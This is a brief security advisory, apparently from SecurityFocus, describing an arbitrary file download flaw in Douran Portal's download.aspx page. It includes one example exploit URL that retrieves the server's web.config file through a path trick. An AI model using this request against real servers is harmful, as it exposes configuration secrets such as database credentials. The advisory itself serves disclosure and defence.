Douran Portal 'download.aspx' Arbitrary File Download Vulnerability

An attacker can exploit this issue using a browser.

The following example URI is available:

http://www.example.com/download.aspx?FilePathAttach=/&FileNameAttach=web.config\.&OriginalAttachFileName=secretfile.txt


 

Privacy Statement
Copyright 2010, SecurityFocus